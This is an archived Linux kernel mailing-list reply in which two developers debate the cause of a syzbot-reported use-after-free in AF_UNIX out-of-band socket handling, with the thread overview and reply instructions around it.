From: Kuniyuki Iwashima <kuniyu@amazon.com>
To: <rao.shoaib@oracle.com>
Cc: <davem@davemloft.net>, <edumazet@google.com>, <kuba@kernel.org>,
<kuniyu@amazon.com>, <linux-kernel@vger.kernel.org>,
<netdev@vger.kernel.org>, <pabeni@redhat.com>,
<syzbot+8811381d455e3e9ec788@syzkaller.appspotmail.com>,
<syzkaller-bugs@googlegroups.com>
Subject: Re: [syzbot] [net?] KASAN: slab-use-after-free Read in unix_stream_read_actor (2)
Date: Tue, 10 Sep 2024 17:16:58 -0700 [thread overview]
Message-ID: <20240911001658.27733-1-kuniyu@amazon.com> (raw)
In-Reply-To: <1b494cee-560c-48f0-99d7-60561c91b4f1@oracle.com>
From: Shoaib Rao <rao.shoaib@oracle.com>
Date: Tue, 10 Sep 2024 16:42:33 -0700
> On 9/10/2024 3:59 PM, Kuniyuki Iwashima wrote:
> > From: Shoaib Rao <rao.shoaib@oracle.com>
> > Date: Tue, 10 Sep 2024 15:30:08 -0700
> >> My fellow engineer let's first take a breath and calm down. We both are
> >> trying to do the right thing. Now read my comments below and if I still
> >> don't get it, please be patient, maybe I am not as smart as you are.
> >>
> >> On 9/10/2024 2:53 PM, Kuniyuki Iwashima wrote:
> >>> From: Shoaib Rao <rao.shoaib@oracle.com>
> >>> Date: Tue, 10 Sep 2024 13:57:04 -0700
> >>>> The commit Message:
> >>>>
> >>>> syzbot reported use-after-free in unix_stream_recv_urg(). [0]
> >>>>
> >>>> The scenario is
> >>>>
> >>>> 1. send(MSG_OOB)
> >>>> 2. recv(MSG_OOB)
> >>>> -> The consumed OOB remains in recv queue
> >>>> 3. send(MSG_OOB)
> >>>> 4. recv()
> >>>> -> manage_oob() returns the next skb of the consumed OOB
> >>>> -> This is also OOB, but unix_sk(sk)->oob_skb is not cleared
> >>>> 5. recv(MSG_OOB)
> >>>> -> unix_sk(sk)->oob_skb is used but already freed
> >>>
> >>> How did you miss this ?
> >>>
> >>> Again, please read my patch and mails **carefully**.
> >>>
> >>> unix_sk(sk)->oob_sk wasn't cleared properly and illegal access happens
> >>> in unix_stream_recv_urg(), where ->oob_skb is dereferenced.
> >>>
> >>> Here's _technical_ thing that you want.
> >>
> >> This is exactly what I am trying to point out to you.
> >> The skb has proper references and is NOT de-referenced because
> >> __skb_datagram_iter() detects that the length is zero and returns EFAULT.
> >
> > It's dereferenced as UNIXCB(skb).consumed first in
> > unix_stream_read_actor().
> >
>
> That does not matter as the skb still has a refernce. That is why I
> asked you to print the reference count.
It does matter. Please read carefully again...
> > Then, 1 byte of data is copied without -EFAULT because
> > unix_stream_recv_urg() always passes 1 as chunk (size) to
> > recv_actor().
>
> Can you verify this because IIRC it is not de-refernced. AFAIK, KASAN
> does nothing that would cause returning EFAULT and if KASAN does spot
> this illegal access why is it not pancing the system or producing a report.
>
> This is where we disagree.
The returned value from recv_actor() was exact 1 when KASAN was off.
It was -EFAULT only when KASAN was on.
Anyway, -EFAULT is not that important and I'm not so interested in how
KASAN triggers that. What's important is the fact that the first UAF
is UNIXCB() and the bug happens before that.
[...]
> > Note this is on top of net-next where no additional refcnt is taken
> > for OOB
Also in my patch:
The recent commit 8594d9b85c07 ("af_unix: Don't call skb_get() for OOB
skb.") uncovered the issue.
next prev parent reply other threads:[~2024-09-11 0:17 UTC|newest]
Thread overview: 36+ messages / expand[flat|nested] mbox.gz Atom feed top
2024-09-04 15:13 [syzbot] [net?] KASAN: slab-use-after-free Read in unix_stream_read_actor (2) syzbot
2024-09-04 15:32 ` Eric Dumazet
2024-09-04 17:32 ` Shoaib Rao
2024-09-05 7:35 ` Shoaib Rao
2024-09-05 8:04 ` Eric Dumazet
2024-09-05 19:06 ` Shoaib Rao
2024-09-05 19:46 ` Kuniyuki Iwashima
2024-09-05 20:15 ` Shoaib Rao
2024-09-05 20:35 ` Kuniyuki Iwashima
2024-09-05 20:48 ` Shoaib Rao
2024-09-05 21:03 ` Kuniyuki Iwashima
2024-09-06 12:37 ` Eric Dumazet
2024-09-06 16:48 ` Shoaib Rao
2024-09-07 5:06 ` Shoaib Rao
2024-09-07 5:39 ` Kuniyuki Iwashima
2024-09-10 0:29 ` Shoaib Rao
2024-09-10 0:48 ` Kuniyuki Iwashima
2024-09-10 16:55 ` Shoaib Rao
2024-09-10 17:57 ` Kuniyuki Iwashima
2024-09-10 18:16 ` Shoaib Rao
2024-09-10 18:33 ` Kuniyuki Iwashima
2024-09-10 18:49 ` Shoaib Rao
2024-09-10 19:49 ` Kuniyuki Iwashima
2024-09-10 20:57 ` Shoaib Rao
2024-09-10 21:53 ` Kuniyuki Iwashima
2024-09-10 22:30 ` Shoaib Rao
2024-09-10 22:59 ` Kuniyuki Iwashima
2024-09-10 23:42 ` Shoaib Rao
2024-09-11 0:16 ` Kuniyuki Iwashima [this message]
2024-09-05 20:37 ` Shoaib Rao
2024-09-05 20:41 ` Shoaib Rao
2024-09-05 20:42 ` Kuniyuki Iwashima
2024-09-05 5:25 ` Lizhi Xu
2024-09-05 5:57 ` syzbot
2024-09-05 6:59 ` Kuniyuki Iwashima
2024-09-05 7:46 ` syzbot
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=20240911001658.27733-1-kuniyu@amazon.com \
--to=kuniyu@amazon.com \
--cc=davem@davemloft.net \
--cc=edumazet@google.com \
--cc=kuba@kernel.org \
--cc=linux-kernel@vger.kernel.org \
--cc=netdev@vger.kernel.org \
--cc=pabeni@redhat.com \
--cc=rao.shoaib@oracle.com \
--cc=syzbot+8811381d455e3e9ec788@syzkaller.appspotmail.com \
--cc=syzkaller-bugs@googlegroups.com \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).